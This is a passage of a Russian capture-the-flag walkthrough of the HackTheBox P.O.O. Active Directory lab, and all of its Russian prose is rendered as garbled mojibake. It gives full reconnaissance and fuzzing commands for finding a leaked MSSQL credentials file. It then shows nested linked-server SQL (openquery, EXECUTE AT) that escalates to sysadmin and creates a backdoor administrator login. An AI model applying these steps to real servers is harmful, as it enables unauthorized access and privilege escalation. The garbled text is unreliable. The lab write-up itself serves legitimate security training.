HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

Π’ Π΄Π°Π½Π½ΠΎΠΉ ΡΡ‚Π°Ρ‚ΡŒΠ΅ Ρ€Π°Π·Π±Π΅Ρ€Π΅ΠΌ ΠΏΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π½Π΅ просто ΠΌΠ°ΡˆΠΈΠ½Ρ‹, Π° Ρ†Π΅Π»ΠΎΠΉ ΠΌΠΈΠ½ΠΈ-Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ с ΠΏΠ»ΠΎΡ‰Π°Π΄ΠΊΠΈ HackTheBox.

Как сказано Π² описании, P.O.O. ΠΏΡ€Π΅Π΄Π½Π°Π·Π½Π°Ρ‡Π΅Π½ для ΠΏΡ€ΠΎΠ²Π΅Ρ€ΠΊΠΈ Π½Π°Π²Ρ‹ΠΊΠΎΠ² Π½Π° всСх стадиях Π°Ρ‚Π°ΠΊ Π² нСбольшой срСдС Active Directory. ЦСль состоит Π² Ρ‚ΠΎΠΌ, Ρ‡Ρ‚ΠΎΠ±Ρ‹ ΡΠΊΠΎΠΌΠΏΡ€ΠΎΠΌΠ΅Ρ‚ΠΈΡ€ΠΎΠ²Π°Ρ‚ΡŒ доступный хост, ΠΏΠΎΠ²Ρ‹ΡΠΈΡ‚ΡŒ ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΈ ΠΈ, Π² ΠΊΠΎΠ½Π΅Ρ‡Π½ΠΎΠΌ ΠΈΡ‚ΠΎΠ³Π΅, ΡΠΊΠΎΠΌΠΏΡ€ΠΎΠΌΠ΅Ρ‚ΠΈΡ€ΠΎΠ²Π°Ρ‚ΡŒ вСсь Π΄ΠΎΠΌΠ΅Π½, собрав ΠΏΡ€ΠΈ этом 5 Ρ„Π»Π°Π³ΠΎΠ².

ΠŸΠΎΠ΄ΠΊΠ»ΡŽΡ‡Π΅Π½ΠΈΠ΅ ΠΊ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ осущСствляСтся Ρ‡Π΅Ρ€Π΅Π· VPN. РСкомСндуСтся Π½Π΅ ΠΏΠΎΠ΄ΠΊΠ»ΡŽΡ‡Π°Ρ‚ΡŒΡΡ с Ρ€Π°Π±ΠΎΡ‡Π΅Π³ΠΎ ΠΊΠΎΠΌΠΏΡŒΡŽΡ‚Π΅Ρ€Π° ΠΈΠ»ΠΈ с хоста, Π³Π΄Π΅ ΠΈΠΌΠ΅ΡŽΡ‚ΡΡ Π²Π°ΠΆΠ½Ρ‹Π΅ для вас Π΄Π°Π½Π½Ρ‹Π΅, Ρ‚Π°ΠΊ ΠΊΠ°ΠΊ Π’Ρ‹ ΠΏΠΎΠΏΠ°Π΄Π°Π΅Ρ‚Π΅ Π² Ρ‡Π°ΡΡ‚Π½ΡƒΡŽ ΡΠ΅Ρ‚ΡŒ с людьми, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ Ρ‡Ρ‚ΠΎ-Ρ‚ΠΎ Π΄Π° ΡƒΠΌΠ΅ΡŽΡ‚ Π² области Π˜Π‘ πŸ™‚

ΠžΡ€Π³Π°Π½ΠΈΠ·Π°Ρ†ΠΈΠΎΠ½Π½Π°Ρ информация
Π§Ρ‚ΠΎΠ±Ρ‹ Π²Ρ‹ ΠΌΠΎΠ³Π»ΠΈ ΡƒΠ·Π½Π°Π²Π°Ρ‚ΡŒ ΠΎ Π½ΠΎΠ²Ρ‹Ρ… ΡΡ‚Π°Ρ‚ΡŒΡΡ…, ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ½ΠΎΠΌ обСспСчСнии ΠΈ Π΄Ρ€ΡƒΠ³ΠΎΠΉ ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΠΈ, я создал ΠΊΠ°Π½Π°Π» Π² Telegram ΠΈ Π³Ρ€ΡƒΠΏΠΏΡƒ для обсуТдСния Π»ΡŽΠ±Ρ‹Ρ… вопросов Π² области Π˜ΠΈΠšΠ‘. Π’Π°ΠΊΠΆΠ΅ ваши Π»ΠΈΡ‡Π½Ρ‹Π΅ ΠΏΡ€ΠΎΡΡŒΠ±Ρ‹, вопросы, прСдлоТСния ΠΈ Ρ€Π΅ΠΊΠΎΠΌΠ΅Π½Π΄Π°Ρ†ΠΈΠΈ Ρ€Π°ΡΡΠΌΠΎΡ‚Ρ€ΡŽ Π»ΠΈΡ‡Π½ΠΎ ΠΈ ΠΎΡ‚Π²Π΅Ρ‡Ρƒ всСм.

Вся информация прСдставлСна ΠΈΡΠΊΠ»ΡŽΡ‡ΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎ Π² ΠΎΠ±Ρ€Π°Π·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒΠ½Ρ‹Ρ… цСлях. Автор этого Π΄ΠΎΠΊΡƒΠΌΠ΅Π½Ρ‚Π° Π½Π΅ нСсёт Π½ΠΈΠΊΠ°ΠΊΠΎΠΉ отвСтствСнности Π·Π° любой ΡƒΡ‰Π΅Ρ€Π±, ΠΏΡ€ΠΈΡ‡ΠΈΠ½Π΅Π½Π½Ρ‹ΠΉ ΠΊΠΎΠΌΡƒ-Π»ΠΈΠ±ΠΎ Π² Ρ€Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚Π΅ использования Π·Π½Π°Π½ΠΈΠΉ ΠΈ ΠΌΠ΅Ρ‚ΠΎΠ΄ΠΎΠ², ΠΏΠΎΠ»ΡƒΡ‡Π΅Π½Π½Ρ‹Ρ… Π² Ρ€Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚Π΅ изучСния Π΄Π°Π½Π½ΠΎΠ³ΠΎ Π΄ΠΎΠΊΡƒΠΌΠ΅Π½Ρ‚Π°.

Intro

Π”Π°Π½Π½Ρ‹ΠΉ endgame состоит ΠΈΠ· Π΄Π²ΡƒΡ… машин, ΠΈ содСрТит 5 Ρ„Π»Π°Π³ΠΎΠ².

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

Π’Π°ΠΊ ΠΆΠ΅ даСтся описаниС ΠΈ адрСс доступного хоста.

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

НачнСм!

Recon flag

Данная машина ΠΈΠΌΠ΅Π΅Ρ‚ IP адрСс 10.13.38.11, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ я добавляю Π² /etc/hosts.
10.13.38.11 poo.htb

ΠŸΠ΅Ρ€Π²Ρ‹ΠΌ Π΄Π΅Π»ΠΎΠΌ сканируСм ΠΎΡ‚ΠΊΡ€Ρ‹Ρ‚Ρ‹Π΅ ΠΏΠΎΡ€Ρ‚Ρ‹. Π’Π°ΠΊ ΠΊΠ°ΠΊ ΡΠΊΠ°Π½ΠΈΡ€ΠΎΠ²Π°Ρ‚ΡŒ всС ΠΏΠΎΡ€Ρ‚Ρ‹ nmap’ом Π΄ΠΎΠ»Π³ΠΎ, Ρ‚ΠΎ я сначала сдСлаю это с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ masscan. ΠœΡ‹ сканируСм всС TCP ΠΈ UDP ΠΏΠΎΡ€Ρ‚Ρ‹ с интСрфСйса tun0 со ΡΠΊΠΎΡ€ΠΎΡΡ‚ΡŒΡŽ 500 ΠΏΠ°ΠΊΠ΅Ρ‚ΠΎΠ² Π² сСкунду.

sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

Π’Π΅ΠΏΠ΅Ρ€ΡŒ для получСния Π±ΠΎΠ»Π΅Π΅ ΠΏΠΎΠ΄Ρ€ΠΎΠ±Π½ΠΎΠΉ ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΠΈ ΠΎ сСрвисах, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ Ρ€Π°Π±ΠΎΡ‚Π°ΡŽΡ‚ Π½Π° ΠΏΠΎΡ€Ρ‚Π°Ρ…, запустим сканированиС с ΠΎΠΏΡ†ΠΈΠ΅ΠΉ -А.

nmap -A poo.htb -p80,1433

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

Π’Π°ΠΊΠΈΠΌ ΠΎΠ±Ρ€Π°Π·ΠΎΠΌ, ΠΌΡ‹ ΠΈΠΌΠ΅Π΅ΠΌ слуТбы IIS ΠΈ MSSQL. ΠŸΡ€ΠΈ этом ΠΌΡ‹ ΡƒΠ·Π½Π°Π΅ΠΌ Ρ€Π΅Π°Π»ΡŒΠ½ΠΎΠ΅ DNS имя Π΄ΠΎΠΌΠ΅Π½Π° ΠΈ ΠΊΠΎΠΌΠΏΡŒΡŽΡ‚Π΅Ρ€Π°. На Π²Π΅Π± сСрвСрС нас встрСчаСт домашняя страница IIS.

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

Π”Π°Π²Π°ΠΉΡ‚Π΅ ΠΏΠ΅Ρ€Π΅Π±Π΅Ρ€Π΅ΠΌ Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΠΈ. Π― для этого ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡŽ gobuster. Π’ ΠΏΠ°Ρ€Π°ΠΌΠ΅Ρ‚Ρ€Π°Ρ… ΡƒΠΊΠ°Π·Ρ‹Π²Π°Π΅ΠΌ количСство ΠΏΠΎΡ‚ΠΎΠΊΠΎΠ² 128 (-t), URL (-u), ΡΠ»ΠΎΠ²Π°Ρ€ΡŒ (-w) ΠΈ Ρ€Π°ΡΡˆΠΈΡ€Π΅Π½ΠΈΡ, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ нас ΠΈΠ½Ρ‚Π΅Ρ€Π΅ΡΡƒΡŽΡ‚ (-x).

gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

Π’Π°ΠΊΠΈΠΌ ΠΎΠ±Ρ€Π°Π·ΠΎΠΌ ΠΌΡ‹ ΠΈΠΌΠ΅Π΅ΠΌ HTTP Π°ΡƒΡ‚Π΅Π½Ρ‚ΠΈΡ„ΠΈΠΊΠ°Ρ†ΠΈΡŽ для Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΠΈ /admin, Π° Ρ‚Π°ΠΊΠΆΠ΅ доступный Ρ„Π°ΠΉΠ» Ρ…Ρ€Π°Π½ΠΈΠ»ΠΈΡ‰Π° слуТбы Ρ€Π°Π±ΠΎΡ‡Π΅Π³ΠΎ стола .DS_Store. .DS_Store β€” это Ρ„Π°ΠΉΠ»Ρ‹, Π² ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Ρ… хранятся ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒΡΠΊΠΈΠ΅ настройки для ΠΏΠ°ΠΏΠΊΠΈ, Ρ‚Π°ΠΊΠΈΠ΅ ΠΊΠ°ΠΊ список Ρ„Π°ΠΉΠ»ΠΎΠ², располоТСниС Π·Π½Π°Ρ‡ΠΊΠΎΠ², Π²Ρ‹Π±Ρ€Π°Π½Π½ΠΎΠ΅ Ρ„ΠΎΠ½ΠΎΠ²ΠΎΠ΅ ΠΈΠ·ΠΎΠ±Ρ€Π°ΠΆΠ΅Π½ΠΈΠ΅. Π’Π°ΠΊΠΎΠΉ Ρ„Π°ΠΉΠ» ΠΌΠΎΠΆΠ΅Ρ‚ ΠΏΠΎΠΏΠ°Π΄Π°Ρ‚ΡŒ Π² Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΡŽ Π²Π΅Π±-сСрвСра Ρƒ Π²Π΅Π± Ρ€Π°Π·Ρ€Π°Π±ΠΎΡ‚Ρ‡ΠΈΠΊΠΎΠ². Π’Π°ΠΊΠΈΠΌ ΠΎΠ±Ρ€Π°Π·ΠΎΠΌ, ΠΌΡ‹ ΠΏΠΎΠ»ΡƒΡ‡ΠΈΡ‚ΡŒ ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΡŽ ΠΎ содСрТимом ΠΊΠ°Ρ‚Π°Π»ΠΎΠ³. Для этого ΠΌΠΎΠΆΠ½ΠΎ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒ DS_Store crawler.

python3 dsstore_crawler.py -i http://poo.htb/

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

ΠœΡ‹ ΠΏΠΎΠ»ΡƒΡ‡Π°Π΅ΠΌ содСрТимоС ΠΊΠ°Ρ‚Π°Π»ΠΎΠ³Π°. Π‘Π°ΠΌΠΎΠ΅ интСрСсноС здСсь β€” это ΠΊΠ°Ρ‚Π°Π»ΠΎΠ³ /dev, ΠΈΠ· ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠ³ΠΎ ΠΌΡ‹ Π² Π΄Π²ΡƒΡ… Π²Π΅Ρ‚ΠΊΠ°Ρ… ΠΌΠΎΠΆΠ΅ΠΌ ΠΏΠΎΡΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ исходники ΠΈ Ρ„Π°ΠΉΠ»Ρ‹ db. Но ΠΌΡ‹ ΠΌΠΎΠΆΠ΅ΠΌ ΠΏΠ΅Ρ€Π²Ρ‹Π΅ 6 символов ΠΈΠΌΠ΅Π½ΠΈ Ρ„Π°ΠΉΠ»ΠΎΠ² ΠΈ Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΠΉ, Ссли сСрвис уязвим ΠΊ IIS ShortName. ΠŸΡ€ΠΎΠ²Π΅Ρ€ΠΈΡ‚ΡŒ Π½Π°Π»ΠΈΡ‡ΠΈΠ΅ Π΄Π°Π½Π½ΠΎΠΉ уязвимости ΠΌΠΎΠΆΠ½ΠΎ с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ IIS shortname Scanner.

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

И Π½Π° Ρ…ΠΎΠ΄ΠΈΠΌ ΠΎΠ΄ΠΈΠ½ тСкстовый Ρ„Π°ΠΉΠ», ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ начинаСтся с Β«poo_coΒ». НС зная Ρ‡Ρ‚ΠΎ Π΄Π΅Π»Π°Ρ‚ΡŒ дальшС, я просто Π²Ρ‹Π±Ρ€Π°Π» ΠΈΠ· словаря Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΠΉ всС слова, Π½Π°Ρ‡ΠΈΠ½Π°ΡŽΡ‰ΠΈΠ΅ΡΡ Π½Π° Β«coΒ».

cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt

И ΠΏΠ΅Ρ€Π΅Π±Π΅Ρ€Π΅ΠΌ с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ wfuzz.

wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

И Π½Π°Ρ…ΠΎΠ΄ΠΈΠΌ подходящСС слово! Π‘ΠΌΠΎΡ‚Ρ€ΠΈΠΌ Π΄Π°Π½Π½Ρ‹ΠΉ Ρ„Π°ΠΉΠ», сохраняСм ΡƒΡ‡Π΅Ρ‚Π½Ρ‹Π΅ Π΄Π°Π½Π½Ρ‹Π΅ (судя ΠΏΠΎ ΠΏΠ°Ρ€Π°ΠΌΠ΅Ρ‚Ρ€Ρƒ DBNAME, ΠΎΠ½ΠΈ ΠΎΡ‚ MSSQL).

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

Π‘Π΄Π°Π΅ΠΌ Ρ„Π»Π°Π³, ΠΈ ΠΌΡ‹ продвигаСмся Π½Π° 20%.

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

Huh flag

ΠŸΠΎΠ΄ΠΊΠ»ΡŽΡ‡Π°Π΅ΠΌΡΡ ΠΊ MSSQL, я ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡŽ DBeaver.

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

НичСго интСрСсного Π² Π΄Π°Π½Π½ΠΎΠΉ Π±Π°Π·Π΅ Π½Π΅ Π½Π°Ρ…ΠΎΠ΄ΠΈΠΌ, Π΄Π°Π²Π°ΠΉΡ‚Π΅ создадим Π Π΅Π΄Π°ΠΊΡ‚ΠΎΡ€ SQL ΠΈ ΠΏΡ€ΠΎΠ²Π΅Ρ€ΠΈΠΌ, ΠΊΠ°ΠΊΠΈΠ΅ Π΅ΡΡ‚ΡŒ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΠΈ.

SELECT name FROM master..syslogins;

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

Π£ нас Π΄Π²Π° ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ. Π”Π°Π²Π°ΠΉΡ‚Π΅ ΠΏΡ€ΠΎΠ²Π΅Ρ€ΠΈΠΌ свои ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΈ.

SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

Π’Π°ΠΊΠΈΠΌ ΠΎΠ±Ρ€Π°Π·ΠΎΠΌ, ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΉ Π½ΠΈΠΊΠ°ΠΊΠΈΡ… Π½Π΅Ρ‚. Π”Π°Π²Π°ΠΉΡ‚Π΅ посмотрим связанныС сСрвСры, ΠΏΡ€ΠΎ Π΄Π°Π½Π½ΡƒΡŽ ΠΌΠ΅Ρ‚ΠΎΠ΄ΠΈΠΊΡƒ я ΠΏΠΎΠ΄Ρ€ΠΎΠ±Π½ΠΎ писал здСсь.

SELECT * FROM master..sysservers;

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

Π’Π°ΠΊ ΠΌΡ‹ Π½Π°Ρ…ΠΎΠ΄ΠΈΠΌ Π΅Ρ‰Π΅ ΠΎΠ΄ΠΈΠ½ SQL Server. Π”Π°Π²Π°ΠΉΡ‚Π΅ ΠΏΡ€ΠΎΠ²Π΅Ρ€ΠΈΠΌ Π²Ρ‹ΠΏΠΎΠ»Π½Π΅Π½ΠΈΠ΅ ΠΊΠΎΠΌΠ°Π½Π΄ Π½Π° этом сСрвСрС с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ openquery().

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

И ΠΌΡ‹ Π΄Π°ΠΆΠ΅ ΠΌΠΎΠΆΠ΅ΠΌ Π²Ρ‹ΡΡ‚Ρ€Π°ΠΈΠ²Π°Ρ‚ΡŒ Π΄Π΅Ρ€Π΅Π²ΠΎ запросов.

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');

Π”Π΅Π»ΠΎ Π² Ρ‚ΠΎΠΌ, Ρ‡Ρ‚ΠΎ ΠΊΠΎΠ³Π΄Π° ΠΌΡ‹ выполняСм запрос Π½Π° связанный сСрвСр, Ρ‚ΠΎ запрос выполняСтся Π² контСкстС Π΄Ρ€ΡƒΠ³ΠΎΠ³ΠΎ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ! Π”Π°Π²Π°ΠΉΡ‚Π΅ посмотрим, Π² контСкстС ΠΊΠ°ΠΊΠΎΠ³ΠΎ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ ΠΌΡ‹ Ρ€Π°Π±ΠΎΡ‚Π°Π΅ΠΌ Π½Π° связанном сСрвСрС.

SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

А Ρ‚Π΅ΠΏΠ΅Ρ€ΡŒ посмотрим Π² ΠΊΠ°ΠΊΠΎΠΌ контСкстС Π²Ρ‹ΠΏΠΎΠ»Π½ΡΡŽΡ‚ΡΡ запрос со связанного сСрвСра Π½Π° наш!

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

Π’Π°ΠΊΠΈΠΌ ΠΎΠ±Ρ€Π°Π·ΠΎΠΌ, это контСкст DBO, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ Π΄ΠΎΠ»ΠΆΠ΅Π½ ΠΎΠ±Π»Π°Π΄Π°Ρ‚ΡŒ всСми привилСгиями. Π”Π°Π²Π°ΠΉΡ‚Π΅ ΠΏΡ€ΠΎΠ²Π΅Ρ€ΠΈΠΌ ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΈ Π² случаС запроса со связанного сСрвСра.

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

Как ΠΌΠΎΠΆΠ½ΠΎ Π·Π°ΠΌΠ΅Ρ‚ΠΈΡ‚ΡŒ, Ρƒ нас Π΅ΡΡ‚ΡŒ всС ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΈ! Π”Π°Π²Π°ΠΉΡ‚Π΅ Ρ‚Π°ΠΊ создадим своСго Π°Π΄ΠΌΠΈΠ½Π°. Но Ρ‡Π΅Ρ€Π΅Π· openquery Π½Π΅ ΠΏΡƒΡΠΊΠ°ΡŽΡ‚, Π΄Π°Π²Π°ΠΉΡ‚Π΅ сдСлаСм это Ρ‡Π΅Ρ€Π΅Π· EXECUTE AT.

EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";

И Ρ‚Π΅ΠΏΠ΅Ρ€ΡŒ ΠΏΠΎΠ΄ΠΊΠ»ΡŽΡ‡Π°Π΅ΠΌΡΡ с ΡƒΡ‡Π΅Ρ‚Π½Ρ‹ΠΌΠΈ Π΄Π°Π½Π½Ρ‹ΠΌΠΈ Π½ΠΎΠ²ΠΎΠ³ΠΎ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ, наблюдаСм Π½ΠΎΠ²ΡƒΡŽ Π±Π°Π·Ρƒ Π΄Π°Π½Π½Ρ‹Ρ… flag.

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

